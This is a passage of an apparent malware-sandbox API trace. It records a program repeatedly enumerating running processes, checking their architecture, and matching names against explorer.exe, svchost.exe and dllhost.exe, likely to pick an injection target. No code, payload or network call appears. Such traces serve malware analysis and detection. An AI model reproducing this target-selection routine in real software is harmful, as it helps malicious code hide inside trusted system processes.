(lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0202.416] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0202.416] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0202.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0202.417] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.417] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.417] CloseHandle (hObject=0xec) returned 1 [0202.417] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0202.417] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0202.417] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0202.417] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0202.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0202.417] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.417] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.417] CloseHandle (hObject=0xec) returned 1 [0202.417] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0202.417] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0202.417] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0202.417] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0202.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0202.418] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.418] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.418] CloseHandle (hObject=0xec) returned 1 [0202.418] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0202.418] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0202.418] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0202.418] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0202.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0202.419] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.419] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.419] CloseHandle (hObject=0xec) returned 1 [0202.419] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0202.419] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0202.419] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0202.419] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0202.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0202.419] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.419] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.419] CloseHandle (hObject=0xec) returned 1 [0202.419] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0202.420] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0202.420] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0202.420] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0202.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0202.420] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.420] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.420] CloseHandle (hObject=0xec) returned 1 [0202.420] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0202.420] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0202.420] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0202.420] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0202.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0202.421] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.421] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.421] CloseHandle (hObject=0xec) returned 1 [0202.421] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0202.421] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0202.421] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0202.421] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0202.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0202.422] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.422] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.422] CloseHandle (hObject=0xec) returned 1 [0202.422] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0202.422] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0202.422] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0202.422] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0202.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0202.422] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.422] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.422] CloseHandle (hObject=0xec) returned 1 [0202.422] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0202.422] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0202.422] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0202.422] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0202.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0202.423] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.423] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.423] CloseHandle (hObject=0xec) returned 1 [0202.423] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0202.423] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0202.423] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0202.423] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0202.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0202.424] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.424] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.424] CloseHandle (hObject=0xec) returned 1 [0202.424] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0202.424] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0202.424] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0202.424] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0202.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0202.424] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.424] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.424] CloseHandle (hObject=0xec) returned 1 [0202.424] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0202.424] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0202.424] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0202.424] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0202.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0202.425] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.425] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.425] CloseHandle (hObject=0xec) returned 1 [0202.425] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0202.425] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0202.425] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0202.425] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0202.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0202.426] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.426] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.426] CloseHandle (hObject=0xec) returned 1 [0202.426] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0202.426] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0202.426] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0202.426] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0202.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0202.426] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.426] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.426] CloseHandle (hObject=0xec) returned 1 [0202.426] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0202.426] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0202.426] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0202.427] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0202.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0202.427] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0202.428] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0202.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0202.428] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0202.429] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0202.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0202.429] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0202.430] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0202.430] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.430] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.430] CloseHandle (hObject=0xec) returned 1 [0202.430] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0202.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0202.431] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.431] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.431] CloseHandle (hObject=0xec) returned 1 [0202.431] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0202.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0202.431] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0202.432] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.432] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.432] CloseHandle (hObject=0xec) returned 1 [0202.432] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0202.432] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0202.467] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.467] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.467] CloseHandle (hObject=0xec) returned 1 [0202.467] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.467] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0202.468] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.468] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.468] CloseHandle (hObject=0xec) returned 1 [0202.468] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0202.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0202.468] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.468] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.468] CloseHandle (hObject=0xec) returned 1 [0202.468] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0202.468] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0202.468] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0202.468] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0202.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0202.469] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0202.469] CloseHandle (hObject=0xe8) returned 1 [0202.469] Sleep (dwMilliseconds=0x3e8) [0203.557] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0203.559] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0203.560] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0203.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0203.560] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0203.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0203.561] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0203.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0203.561] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0203.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0203.562] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0203.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0203.562] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0203.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0203.563] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0203.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0203.564] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0203.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0203.564] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0203.565] OpenProcess 